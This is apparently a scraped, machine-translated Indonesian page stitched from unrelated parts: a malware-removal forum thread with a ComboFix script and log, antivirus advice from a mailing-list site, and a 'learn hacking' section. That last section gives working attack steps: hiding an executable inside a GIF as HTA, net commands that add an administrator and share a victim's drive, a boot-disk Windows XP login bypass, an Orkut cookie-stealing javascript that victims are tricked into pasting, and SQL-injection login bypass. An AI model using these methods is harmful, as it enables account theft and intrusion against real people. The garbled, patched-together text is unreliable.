- End Of File - 8E5BF5531544B503427E1838A315DE5A
__________________
 
 Re: Trojan / Virus Script HTML (Windows XP)
Halo lagi, HertsMan123.

Menonaktifkan antivirus dan aplikasi antispyware, biasanya cukup klik kanan pada ikon System Tray. Mereka dinyatakan dapat mengganggu ComboFix.

Buka Notepad dan copy / paste semua teks dalam codebox bawah pada Notepad:

Kode:
 Folder ::
 c: \ program files \ Lavasoft

 ClearJavaCache ::

 Registry ::
 [HKLM \ ~ \ jasa \ sharedaccess \ parameters \ firewallpolicy \ standardprofile \ GloballyOpenPorts \ Daftar]
 "5985: TCP" = -
 [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ svchost]
 "WinRM" = -

 Sopir ::
 Lavasoft Kernexplorer 
Simpan file Notepad sebagai CFScript.txt ke Desktop dan kemudian tutup file.





Mengacu pada gambar di atas, tarik CFScript ke ComboFix

Jika Anda diminta untuk memperbarui ComboFix, silakan pilih Ya

Desktop Anda mungkin kosong. Hal ini normal. Ini akan kembali ketika ComboFix selesai. ComboFix mungkin reboot komputer Anda. Hal ini normal.

Setelah selesai, itu akan menghasilkan log untuk Anda. Silahkan posting bahwa log, C: \ ComboFix.txt, in reply berikutnya.

Silahkan mengaktifkan kembali antivirus anda sebelum posting log ComboFix.txt.

-------------------------------------------------- ----
 
 Re: Trojan / Virus Script HTML (Windows XP)
Setelah menjalankan ComboFix, PC saya reboot tapi butuh 40 menit sampai aku bisa login kembali.

ComboFix Log:

ComboFix 11-11-14.03 - Dan 15/11/2011 10:39:27.2.1 - x86
Menjalankan dari: c: \ Documents and Settings \ Dan \ Desktop \ ComboFix.exe
Perintah switch digunakan :: c: \ Documents and Settings \ Dan \ Desktop \ CFScript.txt
AV: AntiVir Desktop * Cacat / Diperbarui * {AD166499-45F9-482A-A743-FDD3350758C7}
.
.
(((((((((((((((((((((((((((((((((((((((Penghapusan lain))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
.
(((((((((((((((((((((((((((((((((((((((Driver / Jasa)))))))) )))))))))))))))))))))))))))))))))))))))))
.
.
------- \ Legacy_LAVASOFT_KERNEXPLORER
------- \ Service_Lavasoft Kernexplorer
.
.
(((((((((((((((((((((((((File Dibuat dari 2011/10/15 ke 2011-11-15))))))))))) ))))))))))))))))))))
.
.
2011/11/14 16:24. 2011/11/14 18:30 -------- d ----- w-c: \ Documents and Settings \ Administrator
2011/11/4 19:57. 2011/11/04 19:58 -------- d ----- w-c: \ program files \ Realtek AC97
2011/11/04 16:17. 2011/11/04 16:17 -------- d ----- w-c: \ Documents and Settings \ New Folder
.
.
.
((((((((((((((((((((((((((((((((((((((((Find3M Laporan)))))))) ))))))))))))))))))))))))))))))))))))))))))))
.
2011/11/13 09:10. 2011/08/28 16:11 414.368 ---- aw-c: \ windows \ system32 \ FlashPlayerCPLApp.cpl
2011/10/10 14:22. 2006/08/27 19:30 692.736 ---- aw-c: \ windows \ system32 \ inetcomm.dll
2011/10/03 04:06. 2010-11-02 22:19 472.808 ---- aw-c: \ windows \ system32 \ deployJava1.dll
2011/10/03 01:37. 2011/07/01 19:00 73728 ---- aw-c: \ windows \ system32 \ javacpl.cpl
2011/09/28 07:06. 2006/09/05 14:50 599.040 ---- aw-c: \ windows \ system32 \ crypt32.dll
2011/09/26 10:41. 2008-07-29 19:59 611.328 ---- aw-c: \ windows \ system32 \ uiautomationcore.dll
2011/9/26 10:41. 2006/09/05 14:56 220.160 ---- aw-c: \ windows \ system32 \ oleacc.dll
2011/09/26 10:41. 2006/09/05 14:56 20.480 ---- aw-c: \ windows \ system32 \ oleaccrc.dll
2011/09/22 10:36. 2011/03/17 09:50 101.720 ---- aw-c: \ windows \ system32 \ drivers \ SBREDrv.sys
2011/09/06 13:20. 2006-08-28 03:19 1.858.944 ---- aw-c: \ windows \ system32 \ win32k.sys
2011/08/31 16:00. 2010-11-03 21:33 22216 ---- aw-c: \ windows \ system32 \ drivers \ mbam.sys
2011/08/22 23:48. 2006-08-28 03:19 916.480 ---- aw-c: \ windows \ system32 \ wininet.dll
2011/08/22 23:48. 2006/09/05 14:54 43.520 ------ w-c: \ windows \ system32 \ licmgr10.dll
2011/08/22 23:48. 2006/09/05 14:52 1.469.440 ------ w-c: \ windows \ system32 \ inetcpl.cpl
2011/08/22 11:56. 2006/09/05 14:52 385.024 ---- aw-c: \ windows \ system32 \ html.iec
2011/08/17 13:49. 2006/09/05 14:49 138.496 ---- aw-c: \ windows \ system32 \ drivers \ afd.sys
.
.
(((((((((((((((((((((((((((((SnapShot@2011-11-14_18.33.38)))))))))))) )))))))))))))))))))))))))))))
.
+ 2011/11/15 11:13. 2011/11/15 11:13 16384 c: \ windows \ Temp \ Perflib_Perfdata_450.dat
.
(((((((((((((((((((((((((((((((((((((Reg Poin Memuat)))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
* Catatan * entri kosong & entri standar legit tidak ditampilkan
REGEDIT4
.
[HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]
"CCleaner" = "c: \ program files \ CCleaner \ CCleaner.exe" [2011/07/25 2585408]
.
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]
"Penata suara" = "SOUNDMAN.EXE" [2007/4/16 577.536]
"PCMService" = "c: \ aplikasi \ PowerCinema \ PCMService.exe" [2006/02/23 147.456]
"DetectorApp" = "c: \ program files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ DetectorApp.exe" [2005/10/20 102400]
"ISUSPM Startup" = "c: \ progra ~ 1 \ UMUM ~ 1 \ instal ~ 1 \ UPDATE ~ 1 \ ISUSPM.exe" [2004-07-27 221.184]
"ISUSScheduler" = "c: \ program files \ Common Files \ InstallShield \ updateservice \ issch.exe" [2004-07-27 81920]
"Vade Retro Outlook Express" = "c: \ progra ~ 1 \ GOTOSO ~ 1 \ VADERE ~ 1 \ Vaderetro_oe.exe" [2004/10/04 310.272]
"Avgnt" = "c: \ program files \ Avira \ AntiVir Desktop \ avgnt.exe" [2010-08-02 281.768]
"SunJavaUpdateSched" = "c: \ program files \ Common Files \ Java \ Java Pembaruan \ jusched.exe" [2011/06/09 254.696]
.
[HKEY_USERS \ DEFAULT \ Software \ Microsoft. \ Windows \ CurrentVersion \ Run]
"Ctfmon.exe" = "c: \ windows \ system32 \ ctfmon.exe" [2008/04/14 15360]
.
[HKLM \ ~ \ startupfolder \ C: Documents and Settings ^ ^ ^ Semua Pengguna Start Menu ^ ^ Program Startup ^ Adobe Reader Kecepatan Launch.lnk]
path = c: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup \ Adobe Reader Kecepatan Launch.lnk
cadangan = c: \ windows \ PSS \ Adobe Reader Kecepatan Launch.lnkCommon Startup
.
[HKLM \ ~ \ startupfolder \ C: Documents and Settings ^ ^ ^ Dan Start Menu ^ ^ Program Startup ^ EvernoteClipper.lnk]
path = c: \ Documents and Settings \ Dan \ Start Menu \ Programs \ Startup \ EvernoteClipper.lnk
cadangan = c: \ windows \ PSS \ EvernoteClipper.lnkStartup
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Messenger (Yahoo!)]
2009-05-26 20:06 4.351.216 ---- aw-c: \ program files \ Yahoo! \ Messenger \ yahoomessenger.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ QuickTime Task]
2010-11-29 17:38 421.888 ---- aw-c: \ program files \ QuickTime \ QTTask.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ RealTray]
2006/08/27 20:28 26112-c - aw-c: \ program files \ Estat \ RealPlayer \ realplay.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Recguard]
2002/09/13 20:42 212992-c - aw-c: \ windows \ SMINST \ Recguard.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ RIMBBLaunchAgent.exe]
2011-02-18 10:47 79192-c - aw-c: \ program files \ Common Files \ Research In Motion \ USB Driver \ RIMBBLaunchAgent.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Yahoo! Pager]
2009-05-26 20:06 4.351.216 ---- aw-c: \ program files \ Yahoo! \ Messenger \ yahoomessenger.exe
.
[HKLM \ ~ \ jasa \ sharedaccess \ parameters \ firewallpolicy \ standardprofile \ AuthorizedApplications \ Daftar]
"% Windir% \ \ system32 \ \ sessmgr.exe" =
"C: \ \ APPS \ \ PowerCinema \ \ PowerCinema.exe" =
"C: \ \ APPS \ \ PowerCinema \ \ PCMService.exe" =
"C: \ \ Program Files \ \ Yahoo! \ \ Messenger \ \ yahoomessenger.exe" =
"C: \ \ Program Files \ \ Messenger \ \ msmsgs.exe" =
"% Windir% \ \ Jaringan Diagnostik \ \ xpnetdiag.exe" =
"C: \ \ Program Files \ \ Windows Live \ \ Messenger \ \ wlcsdk.exe" =
"C: \ \ Program Files \ \ Windows Live \ \ Messenger \ \ msnmsgr.exe" =
"C: \ \ Program Files \ \ Bonjour \ \ EXE" =
"C: \ \ Program Files \ \ Mozilla Firefox \ \ firefox.exe" =
"C: \ \ Program Files \ \ Research In Motion \ \ BlackBerry Desktop \ \ Rim.Desktop.exe" =
.
.
Isi folder 'Scheduled Tasks'
.
2011/11/12 c: \ windows \ Tasks \ AppleSoftwareUpdate.job
- C: \ program files \ Apple Software Update \ SoftwareUpdate.exe [2009-10-22 11:50]
.
.
Pindai Tambahan ------- -------
.
uStart Halaman = sekitar : Kosong
mStart Halaman = hxxp :/ / www.yahoo.com/?ilc=8
Pengaturan uInternet, ProxyOverride = *. lokal
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c: \ Documents and Settings \ Dan \ Application Data \ Mozilla \ Firefox \ Profiles \ 2cqiyjwl.default \
FF - prefs.js: browser.startup.homepage - sekitar : Kosong
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c: \ program files \ Mozilla Firefox \ extensions \ {972ce4c6-7e08-4474-a285-3208198ce6fd}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}
FF - Ext: pdf download: {37E4D8EA-8BDA-4831-8EA1-89053939A250} -%% profil \ extensions \ {37E4D8EA-8BDA-4831-8EA1-89053939A250}
FF - Ext: Flashblock: {3d7eb24f-2740-49df-8937-200b1cc08f8a} -%% profil \ extensions \ {3d7eb24f-2740-49df-8937-200b1cc08f8a}
FF - Ext: NoScript: {73a6fe31-595d-460b-A920-fcc0f8843232} -%% profil \ extensions \ {73a6fe31-595d-460b-A920-fcc0f8843232}
FF - Ext: DownloadHelper: {b9db16a4-6edc-47ec-a1f4-b86292ed211d} -%% profil \ extensions \ {b9db16a4-6edc-47ec-a1f4-b86292ed211d}
FF - Ext: Adblock Plus: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - profil%% \ extensions \ {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
FF - Ext: Download Statusbar: {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389} -%% profil \ extensions \ {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}
FF - Ext: Pixlr Grabber: {d47a9f51-8281-43fa-f450-f28ef8735e9a} -%% profil \ extensions \ {d47a9f51-8281-43fa-f450-f28ef8735e9a}
FF - Ext: Microsoft Kerangka Asisten NET: {20a82645-c095-46ed-80e3-08825760534b} - c:. \ Windows \ Microsoft.NET \ Framework \ v3.5 \ Windows Presentation Foundation \ DotNetAssistantExtension
FF - Ext: Java Quick Starter: jqs@sun.com - c:\program files\Java\jre6\lib\deploy\jqs\ff
.
.
************************************************** ************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, GMER - Rootkit Detector and Remover
Rootkit scan 2011-11-15 11:17
Jendela 5.1.2600 Service Pack 3 NTFS
.
scanning proses tersembunyi ...
.
pemindaian entri autostart tersembunyi ...
.
pemindaian file yang tersembunyi ...
.
scan completed successfully
hidden files: 0
.
************************************************** ************************
.
--------------------- DLL Loaded Dalam Menjalankan Proses ---------------------
.
- - - - - - - > 'winlogon.exe'(680)
c: \ windows \ system32 \ Ati2evxx.dll
.
- - - - - - - > 'explorer.exe'(2324)
c:\windows\system32\WININET.dll
c:\progra~1\GOTOSO~1\VADERE~1\VrOe_hook.dll
c:\progra~1\WINDOW~2\wmpband.dll
c: \ windows \ system32 \ ieframe.dll
c: \ windows \ system32 \ webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c: \ windows \ system32 \ PortableDeviceTypes.dll
c: \ windows \ system32 \ PortableDeviceApi.dll
.
------------------------ Menjalankan Proses lain ----------------------- -
.
c:\windows\system32\Ati2evxx.exe
c:\program files\Avira\AntiVir Desktop\sched.exe
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\windows\system32\Ati2evxx.exe
c: \ program files \ Common Files \ Apple \ Dukungan Mobile Device \ AppleMobileDeviceService.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
c: \ program files \ Bonjour \ EXE
c:\apps\Powercinema\Kernel\TV\CLCapSvc.exe
c:\apps\Powercinema\Kernel\CLML_NTService\CLMLServer.exe
c: \ program files \ Java \ jre6 \ bin \ jqs.exe
c:\program files\Sonic\DigitalMedia LE v7\MyDVD LE\USBDeviceService.exe
c:\apps\Powercinema\Kernel\TV\CLSched.exe
c:\windows\SOUNDMAN.EXE
.
************************************************** ************************
.
Completion time: 2011-11-15 11:43:04 - machine was rebooted
ComboFix-quarantined-files.txt 2011-11-15 11:42
ComboFix2.txt 2011-11-14 18:44
.
Pre-Run: 57,885,630,464 bytes free
Post-Run: 57,749,598,208 bytes free
.
- - End Of File - - AADA09C2AF0A8505ACED65A344ED4C8F 
 

 
 

Komputer Virus, Worms, Trojan Horses dan Script Berbahaya

Ada orang jahat di luar sana - melindungi diri sendiri!

 

Latest Alarm

kesalahan-file: tidyout.log Hoax

Sebelum e-mail peringatan virus apapun untuk kerabat dan teman-teman selalu periksa dulu daftar berikut:
  • Hoax (Symantec Anti Virus Research Center)
Sebelum e-mail peringatan mendesak lainnya atau cerita selalu periksa dulu situs web berikut:
Anda mungkin menemukan bahwa "sendok panas" terbaru telah beredar di Internet selama bertahun-tahun.

kesalahan-file: tidyout.log Bagaimana kita melindungi Anda

  • Semua e-mail kami pesan, baik masuk dan keluar, secara otomatis individual scan oleh anti-virus. Ini melindungi komputer kita dari terinfeksi dan mencegah melewati setiap infeksi kepada Anda.
  • Software anti-virus dan definisi virus secara otomatis diperiksa untuk update setiap hari untuk memastikan kita menangkap virus baru segera setelah mereka dikembangkan.
  • KUBA-L mailing list (karena semua daftar RootsWeb milis lain) tidak mendistribusikan attachment atau pesan yang dalam selain teks biasa, seperti html (web bahasa halaman). Hal ini untuk mencegah penyebaran virus atau script jahat melalui daftar. Harap dicatat bahwa ada daftar silsilah banyak lainnya, tidak diselenggarakan oleh RootsWeb, yang tidak menanggalkan lampiran dan dapat menjadi saluran untuk infeksi virus.
    Mohon untuk tidak mengirimkan peringatan virus apapun di dalam daftar KUBA-L - hal itu bertentangan dengan kebijakan dan aturan RootsWeb daftar. Jika Anda menduga virus dalam sebuah daftar pesan silahkan hubungi pengelola daftar langsung. Hampir dapat dipastikan bahwa pesan itu TIDAK didistribusikan oleh daftar meskipun kata-kata "[KUBA-L]" mungkin muncul dalam baris subjek.
  • Kami tidak menggunakan Microsoft Outlook sebagai mail client. Karena popularitasnya, serangan virus banyak yang ditargetkan untuk perangkat lunak tertentu. Jika Anda menggunakan Outlook, pastikan untuk sering memeriksa update keamanan yang tersedia untuk men-download dari Microsoft.

kesalahan-file: tidyout.log Bagaimana melindungi diri Anda

  • Instal Anti-Virus perangkat lunak pada komputer Anda - dan tetap diperbarui virus baru sedang dikembangkan setiap hari dan Anda harus menjaga perangkat lunak yang up to date agar efektif.! Jika perangkat lunak Anda memiliki fitur update secara otomatis pastikan untuk mengaktifkannya. Pastikan software anti-virus Anda diaktifkan untuk memindai semua masuk e-mail.
  • Melakukan backup berkala hard disk Anda setidaknya sekali seminggu. Dengan begitu, jika tisu cacing berbahaya di luar seluruh drive Anda, Anda akan dapat pulih.
  • PERNAH klik dua kali pada lampiran e-mail untuk membukanya. Sebaliknya, klik kanan lampiran sekali dan menyimpannya pada desktop. Hal ini memberikan perangkat lunak anti-virus kesempatan untuk memeriksa isi lampiran.
  • Jangan secara otomatis percaya bahwa pesan adalah OK karena Anda mengenali sumber. Beberapa virus terbaru mencuri alamat dari "keranjang dalam" dari komputer yang terinfeksi dan menggunakan alamat tersebut untuk membuat Anda percaya bahwa pesan yang datang dari orang yang Anda kenal.
  • Jika Anda dapat mengidentifikasi pengirim pesan yang terinfeksi, pastikan untuk memberitahu mereka bahwa komputer mereka terinfeksi. Kadang-kadang virus akan merusak alamat pengirim (misalnya dengan menambahkan tanda hubung di depan) untuk mencegah Anda melakukan hal ini. Anda harus memperbaiki alamat sebelum Anda akan dapat berhasil mengirim balasan.

kesalahan-file: tidyout.log Jika Anda terinfeksi

  • Jika komputer Anda masih operasional, kunjungi situs anti-virus utama, meninjau karakteristik virus dan men-download removal tool khusus untuk virus tersebut. Para produsen perangkat lunak utama anti-virus (lihat di bawah) semua menyediakan alat-alat ini secara gratis. Jalankan alat pada komputer Anda untuk menghapus virus.
  • Update anti-virus software (dalam beberapa kasus, Anda mungkin harus menginstal ulang pertama), dan definisi virus. Kemudian jalankan full scan pada komputer Anda untuk memastikan tidak ada yang tersisa ini atau virus lainnya.

kesalahan-file: tidyout.log Direkomendasikan Internet Security Software

PERINGATAN: Kami tidak merekomendasikan "Norton SystemWorks". Kami telah memiliki masalah serius dengan Utility "Kembali" termasuk dalam software ini yang memaksa kita untuk benar-benar menginstal ulang Windows dan semua program lain pada komputer. Dukungan Symantec Teknis dalam hal ini tidak membantu sama sekali.

kesalahan-file: tidyout.log Virus Informasi Situs


Belajar Hacking

Cracking Zip File Sandi!


buat. file exe ke dalam. manggung file!!

Cukup kebagian menjalankan prompt dan ketik:

cscript.exe hide.vbs your.gif your.exe

Script menggabungkan "your.gif" dan "your.exe" untuk membuat "your.gif.hta.gif", yang menampilkan dengan benar menggunakan browser IE. Jika 'Sembunyikan ekstensi untuk jenis file yang dikenal' pilihan diaktifkan, yang merupakan setting default, "Save Picture As ..." akan men-download "your.gif", itu benar-benar "your.gif.hta". (Contoh: Klik kanan dan Save Homer)

Microsoft digambarkan HTA seperti yang berjalan seperti file. Exe.

Mengaktifkan Task Manager jika Nonaktifkan!

Metode tidak. 1

1. Klik Start -> Run -> Tulis regedit dan tekan pada tombol Enter.

2. Navigasikan ke kunci registri berikut dan kebenaran bahwa pengaturan berikut aktif:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System]
"DisableTaskMgr" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Group Policy Objects \ LocalUser \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System]
"DisableTaskMgr" = dword: 00000000

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ kebijakan \ system \]
"DisableTaskMgr" = dword: 00000000
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]
"DisableCAD" = dword: 00000000 3. Reboot komputer.

Metode .2

1. Klik Start - Run -> Tulis gpedit.msc dan tekan pada tombol Enter.

2. Arahkan ke User Configuration - Administrative Templates -> System - Ctrl + Alt + Del Option

3. Di sisi kanan layar yang kebenaran Hapus Tugas Manajer mengatur pilihan untuk Nonaktifkan atau Tidak Dikonfigurasi.

4. Tutup gpedit.msc

5. Klik Start - Run -> Tulis gpupdate / force dan tekan pada tombol Enter.

Tips bagaimana memulai Hacking!

1) perintah ping
cara yang keren untuk menyapa korban
mencoba
ping [ip korban masuk sini]
jika hasilnya permintaan timed out maka pengguna ofline
jika hasilnya adalah balasan dari [ip] bytes = 32 time <1ms TTL 64
korban yang online.

2) net user [anyname] / add
ia menambahkan net user baru menempatkan setiap inplace nama [anyname]

3) net localgroup administrator [anyname] / add
Ini adalah perintah yang membuat pengguna Anda pergi ke administrator
kelompok.
Tergantung pada versi windows nama akan berbeda.
Jika Anda punya versi amerika nama untuk grup adalah Administrator
dan untuk versi portuguese adalah administradores jadi bagus
yo tahu versi puritan yang windows xp Anda akan mencoba berbagi.

4) sistem berbagi bersih = C: \ / tak terbatas
Ini perintah berbagi drive C: dengan nama sistem.
Anda bisa menggunakan akar setiap dir. malah

5) net use \ \ victimip [nameofnetaccount]
Perintah ini akan membuat sesi antara Anda dan korban
Tentu saja di mana dikatakan victimip Anda akan memasukkan ip korban.
mana nameofnetuser adalah nama melalui mana korban log on

6) explorer \ \ victimip \ system
Dan ini akan membuka windows explorer dalam sistem saham yang ikut
C: drive dengan akses administrator! pertama

Kebutuhan dasar untuk Hacking!

1. Belajar tentang hardware - pada dasarnya bagaimana komputer Anda bekerja.

2. Pelajari tentang berbagai jenis perangkat lunak.

3. Pelajari DOS. (Belajar segala sesuatu yang mungkin)

4. Pelajari cara membuat sebuah file batch saja.

5. Scanning port. (Download Blues port scanner jika ini pertama kalinya Anda)

6. Belajar bahasa pemrograman beberapa
HTML, C + +, Python, Perl .... (Saya akan merekomendasikan Anda belajar html sebagai lang pertama)

7. Bagaimana untuk mengamankan diri (proxy, dll ip menyembunyikan)

8. FTP

9. TCP / IP, UDP, DHCP,

10. Dapatkan tangan Anda kotor dengan jaringan

11. Belajar bahasa diassembler (bahasa yang paling dasar untuk memahami bahasa mesin dan sangat berguna untuk ubderstand ketika ada sesuatu yang dibongkar dan diterjemahkan)

12. Pelajari untuk menggunakan os Unix. (Sistem Unix umumnya sarat dengan alat-alat jaringan serta beberapa hacking tools)

13. Pelajari cara menggunakan Eksploitasi dan kompilasi mereka. (Perl dan c + + adalah harus)

Hack ke komputer Win Xp tanpa Melanggar Sandi!

Ada cara yang jauh lebih baik untuk masuk ke Windows XP. Sangat mudah dan tidak me-reset password. Hack ke komputer yang menjalankan Windows XP tanpa mengubah password dan mengetahui password semua dan setiap pada mesin (termasuk rekening admin). Anda tidak perlu akses ke setiap account untuk melakukan hal ini. Tentu saja, jangan lakukan ini di komputer orang elses tanpa otorisasi yang tepat.


1. Dapatkan akses fisik ke mesin. Ingat bahwa ia harus memiliki CD atau DVD drive.

2. Ambil DreamPackPL SINI

3. Unzip dreampackpl.zip download dan Anda akan mendapatkan dreampackpl.ISO.

4. Gunakan program pembakaran yang dapat membakar ISO images.

5. Setelah Anda memiliki disk, boot dari CD atau DVD drive. Anda akan melihat Windows 2000 Setup dan itu akan memuat beberapa file.

6. Tekan "R" untuk menginstal DreamPackPL.

7. Tekan "C" untuk menginstal DreamPackPL dengan menggunakan recovery console.

8. Pilih penginstalan Windows yang saat ini di komputer (Biasanya adalah "1" jika Anda hanya memiliki satu Windows yang diinstal)

9. Cadangan sfcfiles.dll asli Anda dengan mengetikkan:
"Ren C: \ Windows \ System32 \ sfcfiles.dll sfcfiles.lld" (tanpa tanda kutip)

10. Salin file hack dari CD ke folder system32. Jenis:
"Copy D: \ i386 \ pinball.ex_ C: \ Windows \ System32 \ sfcfiles.dll" (tanpa tanda kutip dan dengan asumsi drive CD Anda D :)

11. Ketik "exit", mengambil disk dan reboot.

12. Pada kolom password, ketik "dreamon" (tanpa tanda kutip) dan menu DreamPack akan
muncul.

13. Klik grafis atas pada menu DreamPack dan Anda akan mendapatkan menu popup.


14. Pergi ke perintah dan memungkinkan pilihan dan memungkinkan perintah tuhan.



Anda juga bisa pergi ke Sandi dan pilih "Logon dengan password yang salah dan hash". Pilihan ini memungkinkan Anda untuk login dengan password APAPUN.

Jika Anda tidak dapat membuka DreamPackPL kemudian Nonaktifkan Anti Virus Anda ..



Hack Megaupload!

1. Pergi ke situs berikut:

Klik di sini

2. Ketik megaupload link di textbox mana http:// sudah ditulis.

3. Hapus centang semua pilihan, seperti "Tidak Cookie, No Script, No Images, Sembunyikan Referal, Sembunyikan User Agent, Sembunyikan Judul, Sembunyikan Header"

4. Klik pada tombol "Saya setuju sebuah ingin berselancar secara anonim".

Setelah itu akan ada LIMIT tidak.

Download dari megauload.com:
Berikut adalah tutorial saya untuk di download dari megauload.com tanpa mendapatkan pesan menjengkelkan 300 slot sibuk.

Downlaod agen pengguna AddOn switcher kemudian ikuti instruksi
Untuk FIREFOX:
Klik Install Now untuk menginstal addon.
Restart FireFox. Alat -> User Agent Switcher ---> Pilihan ---> Pilihan
Klik Agen Pengguna ---> Tambah
Ketik ini:

◘ Description: MEGAUPLOAD

◘ User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Alexa Toolbar)

Klik OK dua kali untuk menyelesaikan menambahkan User Agent.

Mulai sekarang, sebelum men-download file di megaupload hanya pergi Tools -> User Agent Switcher ---> MEGAUPLOAD.

Untuk IE:

Start/run- >> ketik regedit -> ok
Pergi ke: [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Internet Settings \ 5.0 \ User Agent \ platform Post]

Catatan: jika menggunakan IE 7 U

kunjungi: [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Internet Settings \ User Agent \ platform Post]
Klik kanan pada Platform Posting> New> String Value> ketik Alexa Toolbar> ok
Sekarang U dapat download dari megaupload tanpa kesalahan

Orkut Sama seperti pencuri Cookie Hacking!

Pertama mendapatkan firefox dan plugin editor cookie untuk itu ... u akan membutuhkan mereka ...
kemudian membuat dua account palsu ... u akan perlu satu untuk menerima cookie dan satu untuk mengiklankan naskah Anda sehingga jika orkut mulai menghapus profil seperti real account Anda wont dikompromikan ...
kemudian Heres script
Kode:
javascript: tidak ada = replyForm; nobody.toUserId.value = 62915936;
nobody.action = 'Scrapbook.aspx Action.writeScrapBasic?'; nobody.submit ()

u lihat bagian 62915936? thats satu u perlu mengedit untuk mendapatkan cookie ke account Anda ..... CARA PUT NOMOR UR DI BAGIAN ITU??? Ikuti langkah berikut:

pergi ke bagian ALBUM ANDA ... pergi ke foto APAPUN dan klik kanan di atasnya, melihat properti dari gambar tampilan Anda ... u akan melihat sesuatu seperti 12345678.jpg
akan ada nilai angka delapan .. sekarang menempatkan nilai yang di atas javascript.thats itu. sekarang javascript Anda akan terlihat seperti
javascript: tidak ada = replyForm; nobody.toUserId.value = yournumber;
nobody.action = 'Scrapbook.aspx Action.writeScrapBasic?'; nobody.submit ()

Sekarang beri script ini untuk korban, minta dia untuk pergi ke buku memo nya dan paste script ini di address bar dan tekan enter. sekarang Anda akan mendapatkan cookie di lembar memo Anda ..
sekarang setelah mendapatkan cookie ... pergi ke halaman rumah Anda dan buka plugin cookie editor (TOOLS -> EDITOR COOKIE) ... jenis orkut dalam kotak teks dan klik filter / refresh.look untuk cookie orkut_state. hanya dua kali klik dan mengganti bagian orkut_state dengan korban Anda ...
tidak perlu mengubah bagian _umbz _umbc ...

LAIN SCRIPT: 100% bekerja
menempatkan ur delapan digit angka di tempat (53093255)


Hacking situs!

Server dengan satu login langkah dapat diakses melalui metode ini.

Belum semua situs

Jika Anda memiliki pengetahuan html dan javascript maka Anda dapat mengakses situs yang dilindungi kata sandi.
1. Buka situs yang ingin Anda hack. Menyediakan salah username-password di log-nya dalam bentuk.

(Misalnya: Username: saya dan Password: 'or 1 = 1 -)

Kesalahan akan terjadi mengatakan salah username-password. Sekarang bersiaplah

Percobaan dimulai dari sini ...

2. Klik kanan di manapun pada halaman error = >> pergi untuk melihat sumber.


3. Di sana Anda dapat melihat pengkodean html dengan javascripts.


4. Di sana Anda menemukan agak seperti ini .... <_form action="..login....">
<= .. Masuk ....>

5. Sebelum ini informasi login <= __LOGIN> copy url dari situs di mana Anda berada.

(Misalnya: "<_form..........action=http://www.targetwebsite.com/login.......> <.......... = HTTP : com = ""> ") <.......... = HTTP: com =" ">


6. Kemudian hapus javascript dari atas bahwa memvalidasi informasi Anda di server. (Lakukan ini dengan hati-hati, keberhasilan ur untuk hack situs ini yaitu tergantung pada seberapa efisien Anda menghapus javascripts yang memvalidasi informasi account ur)


7. Kemudian kita melihat dari dekat untuk "<_input type="password"> name="password"" [tanpa tanda kutip] -> ganti "<_type=text>" ada <= TEXT> bukan "<_type=password>" < = TEKS> <=> Lihat di sana jika MaxLength password kurang dari 11 kemudian tingkatkan sampai 11. (misalnya: jika kemudian menulis)


8. Hanya pergi ke file => save as dan simpan dimana saja di hardisk anda dengan ext.html (misalnya: c: \ eg.html)


